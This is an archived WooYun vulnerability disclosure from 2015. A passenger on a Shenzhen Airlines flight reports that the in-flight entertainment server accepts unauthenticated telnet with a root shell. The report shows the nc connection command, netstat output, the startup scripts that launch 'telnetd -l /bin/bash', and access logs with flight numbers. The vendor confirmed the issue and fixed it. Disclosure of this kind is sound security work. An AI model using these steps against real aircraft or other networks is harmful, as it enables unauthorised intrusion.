乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-26: 细节已通知厂商并且等待厂商处理中 2015-09-26: 厂商已经确认,细节仅向厂商公开 2015-10-06: 细节向核心白帽子及相关领域专家公开 2015-10-16: 细节向普通白帽子公开 2015-10-26: 细节向实习白帽子公开 2015-11-10: 细节向公众公开
坐飞机无聊啊
连上深圳航空的云图之后发现深处一个网络通过192.168.2.99进行访问云图但
nc -vv 192.168.2.2 23found 0 associationsfound 1 connections: 1:flags=82<CONNECTED,PREFERRED>outif en0src 192.168.2.88 port 59300dst 192.168.2.2 port 23rank info not availableTCP aux info availableConnection to 192.168.2.2 port 23 [tcp/telnet] succeeded!????????bash-3.00#
什么鬼这是,直接连上?
netstat -annetstat -anActive Internet connections (servers and established)Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:8554 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:8300 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN tcp 0 0 192.168.2.2:8080 192.168.2.99:60361 TIME_WAIT tcp 0 0 192.168.2.2:8080 192.168.2.99:60440 TIME_WAIT tcp 0 0 192.168.2.2:8080 192.168.2.99:60726 TIME_WAIT tcp 0 0 192.168.2.2:42675 192.168.2.99:7890 ESTABLISHED tcp 0 547 192.168.2.2:23 192.168.2.88:59300 ESTABLISHED tcp 0 0 192.168.2.2:8080 192.168.2.99:60519 TIME_WAIT tcp 0 0 192.168.2.2:38879 192.168.2.99:8911 ESTABLISHED tcp 0 0 192.168.2.2:42679 192.168.2.99:7890 ESTABLISHED tcp 0 0 192.168.2.2:8080 192.168.2.99:60596 TIME_WAIT tcp 0 0 192.168.2.2:38878 192.168.2.99:8911 ESTABLISHED tcp 0 0 192.168.2.2:8080 192.168.2.99:60663 TIME_WAIT
看看代码
cat *.shcat *.sh#!/bin/shecho "================Enter runapp.sh========================="#start the telnetd service;telnetd -l /bin/bashcp /tango/pointercal /etc#insmod the sata/usb komodprobe sata_tango3modprobe tangox-ehci-hcdmodprobe usb-storage echo "================Build /tmp/sda2 directory========================="mkdir /tmp/sda2mkdir /tmp/sda3mkdir /mnt/sdkmkdir /mnt/nfsmount /dev/sda2 /tmp/sda2mount /dev/sda3 /tmp/sda3/tmp/sda2/avod/AppStart.shcat /tmp/sda2/avod/AppStart.shcat /tmp/sda2/avod/AppStart.sh#!/bin/shif [ ! -d "/home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/build-release/" ]; then mkdir /home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/build-release/ -pfi#firmwareif [ -d "/tmp/sda2/newfw" ] && [ -d "/tmp/sda2/newfw/release/avod" ] &&[ -d "/tmp/sda2/newfw/sdk" ] && [ -d "/tmp/sda2/newfw/release/mini_httpd" ] && [ -d "/tmp/sda2/newfw/release/wwwroot" ] ;then #&& [ -d "/tmp/sda2/newfw/sdkavod" ] echo "Found new firmware..." rm /tmp/sda2/avod -rf mv /tmp/sda2/newfw/release/avod /tmp/sda2/ -f chmod 777 /tmp/sda2/avod -R if [ -d "/tmp/sda2/newfw/release/conf" ] ;then rm /tmp/sda2/conf -rf mv /tmp/sda2/newfw/release/conf /tmp/sda2/conf -f chmod 777 /tmp/sda2/conf -R fi rm /tmp/sda2/sdk -rf mv /tmp/sda2/newfw/sdk /tmp/sda2/ -f #Only for Browser upgrade if [ -d "/tmp/sda2/newfw/sdkavod" ] ;then rm /tmp/sda2/sdkavod/install -rf rm /tmp/sda2/sdkavod/lib -rf mv /tmp/sda2/newfw/sdkavod/install/ /tmp/sda2/sdkavod/ -f mv /tmp/sda2/newfw/sdkavod/lib/ /tmp/sda2/sdkavod/ -f fi # rm /tmp/sda2/sdkavod -rf # mv /tmp/sda2/newfw/sdkavod /tmp/sda2/ -f rm /tmp/sda3/mini_httpd -rf mv /tmp/sda2/newfw/release/mini_httpd /tmp/sda3/mini_httpd chmod 777 /tmp/sda3/mini_httpd -R rm /tmp/sda3/wwwroot -rf mv /tmp/sda2/newfw/release/wwwroot /tmp/sda3/wwwroot chmod 777 /tmp/sda3/wwwroot -R rm /tmp/sda2/newfw -rf sync if [ ! -d "/tango/conf/" ] ;then mkdir /tango/conf -p fi if [ -f "/tmp/sda2/update/system_version_info.xml" ] ;then cp /tmp/sda2/update/system_version_info.xml /tango/conf -f else echo "--->>ERR:can not find system version file" fi #add update kernel echo "begin to update firmware!" /tmp/sda2/avod/updatefirmware.sh source /tango/release/runapp.sh echo "Firwmare update success!" exit fi cd /tmp/sda2/sdkavod/mruasource run.envfw_reload#mkdir /home/antonyln -s /tmp/sda2/sdkavod/lib /home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/build-release/libln -s /tmp/sda2/sdkavod/install /home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/installexport LD_LIBRARY_PATH=/home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/build-release/lib:$LD_LIBRARY_PATH#for cmt smartlcd#cp /tmp/sda2/avod/libdrvMrua_usb_cmt.so /lib/libdrvMrua.socp /tmp/sda2/avod/libdrvMrua_12inch.so /lib/libdrvMrua.so#cp log libecho "copy log lib"cp /tmp/sda2/avod/liblog.so /lib/ -fcp /tmp/sda2/avod/libcurl.so.4 /lib/ -fexport QWS_DISPLAY=linuxfbexport QWS_SIZE=1280x800export QWS_MOUSE_PROTO=linuxtpcd /tmp/sda2/sdkavod/dcchd_SMP8652_3_8_2_black.mips/source trun.envcd /tmp/sda2/avod # for cmtln -sf PD035Vx2.vmf.cmt PD035Vx2.vmf#leib++ for parse the ipaddr from the /tango/avod/ipaddr.cfg#/tmp/sda2/avod/ipconfig.sh#udhcpc -q&#use fixed ip 192.168.2.2/sbin/ifconfig eth0 192.168.2.2 up/tmp/sda3/mini_httpd/sbin/mini_httpd -C /tmp/sda3/mini_httpd/mini.conf & echo "starting control module ....."/tmp/sda2/avod/control_module &sleep 10route add -net 224.0.0.0 netmask 240.0.0.0 dev eth0sleep 5echo "starting play_sub_module ....."/tmp/sda2/avod/play_sub_module &sleep 10echo "starting browser ....."/tmp/sda2/avod/browser -size 1280x800 -qws http://127.0.0.1/cmt_welcome/welcome.html &cp -rf /tmp/sda2/avod/ppp /etc/ cp -rf /tmp/sda2/avod/ppp/resolv.conf /etc/cp -f /tmp/sda2/avod/pppd /usr/sbincp -f /tmp/sda2/avod/chat /usr/sbinroute del -net defaultsleep 5echo "start 3g_control module"/tmp/sda2/avod/3g_control&sleep 10echo "starting cmt_cma_module ....."/tmp/sda2/avod/cmt_cma_module &echo "starting pcu_comm_module ....."/tmp/sda2/avod/pcu_comm_module &echo "starting upgradeModule ....."/tmp/sda2/avod/upgradeModule &echo "starting cmt_suu ....."/tmp/sda2/avod/cmt_suu &#add by hirry for ftpdecho "star ftpd ....."/tmp/sda2/avod/ftp/autoftpd.sh#end by hirry for ftpdsleep 5modprobe snd_seq_ossmodprobe snd_pcm_osssleep 2echo "starting wis-streamer ...." /tmp/sda2/avod/wis-streamer -pcm -nv &#cp /tmp/sda2/avod/resolv.conf /etc/ -fLD_LIBRARY_PATH=/lib:/usr/lib/:/usr/local/lib:$LD_LIBRARY_PATHecho "Starting logmodule ......"/tmp/sda2/avod/logmodule_cmt &echo "Starting bitemodule ....."/tmp/sda2/avod/bitemodule_cmt &echo "Starting proxysyn_mips..."/tmp/sda2/avod/proxysyn_mips &#echo "Starting neusoft dldir..."#/tmp/sda3/wwwroot/neusoft/ok/dldir/dldir &echo "Starting nginx..." /tmp/sda3/wwwroot/nginx/sbin/nginx -p /tmp/sda3/wwwroot/nginx/ & echo "all application booted ....."find /tmp/sda2/avod/logs -mtime +15 -name "*log" -exec rm -f {} \;#add copy kernel/tmp/sda2/avod/copykernel.sh&killall mini_httpd
原来的确是个vod点播系统啊,另外从日志里看一定时候是可以访问10网络的
192.168.2.99 - - [23/Sep/2015:14:53:08 +0800] "GET /Air/download/20150923000001024616.d.icup HTTP/1.1" 206 358560 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"192.168.2.99 - - [23/Sep/2015:14:53:08 +0800] "GET /Air/checkFileSize/20150923000001024615.d.icup HTTP/1.1" 200 7 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"192.168.2.99 - - [23/Sep/2015:14:53:09 +0800] "GET /Air/checkFileSize/20150923000001024616.d.icup HTTP/1.1" 200 6 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"192.168.2.99 - - [23/Sep/2015:14:53:11 +0800] "GET /Air/download/20150923000001024617.d.icup HTTP/1.1" 206 163522 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"192.168.2.99 - - [23/Sep/2015:14:53:11 +0800] "GET /Air/checkFileSize/20150923000001024617.d.icup HTTP/1.1" 200 6 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"192.168.2.99 - - [23/Sep/2015:14:53:11 +0800] "POST /Air/done?FlightNo=B5109&FileName=20150923000001024617.d.icup HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"192.168.2.99 - - [23/Sep/2015:14:53:12 +0800] "POST /Air/done?FlightNo=B5109&FileName=20150923000001024615.d.icup HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"192.168.2.99 - - [23/Sep/2015:14:53:13 +0800] "POST /Air/done?FlightNo=B5109&FileName=20150923000001024616.d.icup HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"192.168.2.99 - - [23/Sep/2015:14:53:41 +0800] "GET /Air/download/20150923000001024619.d.icup HTTP/1.1" 206 343755 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"192.168.2.99 - - [23/Sep/2015:14:53:42 +0800] "GET /Air/download/20150923000001024618.d.icup HTTP/1.1" 206 540360 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"192.168.2.99 - - [23/Sep/2015:14:53:44 +0800] "GET /Air/checkFileSize/20150923000001024619.d.icup HTTP/1.1" 200 6 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"192.168.2.99 - - [23/Sep/2015:14:53:44 +0800] "GET /Air/checkFileSize/20150923000001024618.d.icup HTTP/1.1" 200 7 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"192.168.2.99 - - [23/Sep/2015:14:53:45 +0800] "GET /Air/download/20150923000001024620.d.icup HTTP/1.1" 206 452793 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"192.168.2.99 - - [23/Sep/2015:14:53:46 +0800] "GET /Air/checkFileSize/20150923000001024620.d.icup HTTP/1.1" 200 6 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"192.168.2.99 - - [23/Sep/2015:14:53:47 +0800] "GET /Air/download/20150923000001024622.d.icup HTTP/1.1" 206 98965 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"192.168.2.99 - - [23/Sep/2015:14:53:48 +0800] "POST /Air/done?FlightNo=B5109&FileName=20150923000001024620.d.icup HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"192.168.2.99 - - [23/Sep/2015:14:53:48 +0800] "GET /Air/checkFileSize/20150923000001024622.d.icup HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
telnetd -l /bin/bash
是后门?
危害等级:中
漏洞Rank:10
确认时间:2015-09-26 13:59
感谢您对深航信息系统的关心,已安排人员修复。
暂无